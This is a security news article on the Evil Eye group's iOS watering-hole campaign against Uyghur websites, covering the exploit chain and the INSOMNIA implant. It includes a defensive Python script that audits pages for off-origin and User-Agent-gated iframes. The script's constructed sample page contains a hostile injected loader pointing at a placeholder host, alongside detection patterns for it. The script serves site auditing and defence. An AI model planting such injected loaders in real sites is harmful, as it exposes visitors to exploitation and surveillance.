A Chinese threat actor tracked as Evil Eye has updated the tools it uses to target Uyghurs, a minority Turkic ethnic group in the Xinjiang Uyghur Autonomous Region in Northwest China, incident response and threat intelligence firm Volexity reports.
Evil Eye, which was previously associated with activity linked to the adversary referred to as POISON CARP, was in the past observed leveraging exploits aimed at Android and iOS devices, but went silent after its operations were publicly detailed last year.
Starting in January 2020, however, the threat actor resumed operations, with signs of activity identified “across multiple previously compromised Uyghur websites.”
As part of the new attacks, Evil Eye launched an exploit chain using the open source framework IRONSQUIRREL, targeting iOS devices to abuse a WebKit vulnerability that was patched in the summer of 2019. The exploit, Volexity says, works against iOS versions 12.3, 12.3.1, and 12.3.2.
Successful exploitation of vulnerable systems results in a new version of the threat actor’s implant being delivered, which Volexity refers to as INSOMNIA.
The security firm says it observed multiple attacks installing the implant on iOS devices. Between January and March 2020, these attacks involved six exploit websites, five implant instances, three command and control (C&C) IP-and-port pair combinations, and two unique C&C IP addresses.
Malicious iframes on the compromised websites would load IRONSQUIRREL code, with the most recent attacks observed only on the Uyghur Academy website. The code on this site appears to be used exclusively by the threat actor to target visitors whose User-Agent string matches a vulnerable iPhone or iPad.
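Two traits of the watering-hole pages described above can be checked for by anyone auditing a site they own: iframes that load content from a host other than the page's own, and inline scripts that gate an iframe injection on `navigator.userAgent`. The following is an added example written for this article, not Volexity's tooling or code from the campaign; the HTML it scans is constructed and the `.invalid` hostnames are placeholders.

```python
"""Audit fetched HTML for off-origin iframes and User-Agent-gated iframe
injection, two traits of the compromised pages described in the article.
Added example; the sample page below is constructed for illustration."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: one legitimate same-origin iframe, one injected
# off-origin iframe, and a loader script that only runs on iPhone/iPad
# User-Agents. All hostnames are placeholders, not real infrastructure.
SAMPLE_HTML = """
<html><body>
<iframe src="/embed/video.html"></iframe>
<iframe src="https://cdn.example-static.invalid/widgets.html" width="1" height="1"></iframe>
<script>
if (/iPhone|iPad/.test(navigator.userAgent)) {
  var f = document.createElement('iframe');
  f.src = 'https://stage.example-injected.invalid/loader.html';
  document.body.appendChild(f);
}
</script>
</body></html>
"""


class IframeCollector(HTMLParser):
    """Collect iframe src attributes and the text of each inline script."""

    def __init__(self):
        super().__init__()
        self.iframe_srcs = []
        self.scripts = []
        self._script_buf = None  # not None while inside a <script> element

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            src = dict(attrs).get("src")
            if src:
                self.iframe_srcs.append(src)
        elif tag == "script":
            self._script_buf = []

    def handle_endtag(self, tag):
        if tag == "script" and self._script_buf is not None:
            self.scripts.append("".join(self._script_buf))
            self._script_buf = None

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies through handle_data as CDATA
        if self._script_buf is not None:
            self._script_buf.append(data)


def off_origin_iframes(html, page_url):
    """Return iframe src values whose host differs from the page's own host.

    Relative URLs have no host and are treated as same-origin."""
    parser = IframeCollector()
    parser.feed(html)
    page_host = urlparse(page_url).hostname
    return [
        src for src in parser.iframe_srcs
        if urlparse(src).hostname and urlparse(src).hostname != page_host
    ]


# Heuristics: a script that reads the User-Agent and also builds an iframe
# is the pattern worth a manual look; it is a triage hint, not proof.
UA_CHECK = re.compile(r"navigator\.userAgent")
IFRAME_CREATE = re.compile(r"""createElement\(\s*['"]iframe['"]\s*\)""")


def ua_gated_iframe_scripts(html):
    """Return inline scripts that inspect navigator.userAgent and create an iframe."""
    parser = IframeCollector()
    parser.feed(html)
    return [s for s in parser.scripts if UA_CHECK.search(s) and IFRAME_CREATE.search(s)]


if __name__ == "__main__":
    page = "https://news.example-site.invalid/index.html"  # placeholder
    for src in off_origin_iframes(SAMPLE_HTML, page):
        print("off-origin iframe:", src)
    for script in ua_gated_iframe_scripts(SAMPLE_HTML):
        print("UA-gated iframe injection:\n", script.strip())
```

Running this against pages fetched with a desktop User-Agent would miss content that is only served to mobile browsers, so fetch the page once per User-Agent of interest and diff the results; the gating may be server-side as well as in the script shown here.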
“Note that exploit can be triggered through any browser on the phone, as they all use WebKit. Volexity was able to confirm successful exploitation of a phone running 12.3.1 via the Apple Safari, Google Chrome, and Microsoft Edge mobile browsers,” Volexity explains.
The INSOMNIA implant runs as root with various entitlements, providing the threat actor with access to all the data considered to be of interest.
The updated implant features new hardcoded IP addresses, uses HTTPS for C&C communication, targets Signal and ProtonMail, uses an embedded certificate to validate the C&C server, and employs basic obfuscation. At installation, the malware sends information about all apps installed on the phone.
The implant, however, does not have a mechanism for persistence, which suggests that the attackers need to work quickly to harvest and exfiltrate the data they are looking for to avoid losing access in the event of a reboot. Yet, the researchers also suggest the threat actor might have a method for manually gaining persistence on verified targets.
“It can now be confirmed that in the past six months, Uyghur sites have led to malware for all major platforms, representing a considerable development and upkeep effort by the attackers to spy on the Uyghur population,” Volexity concludes.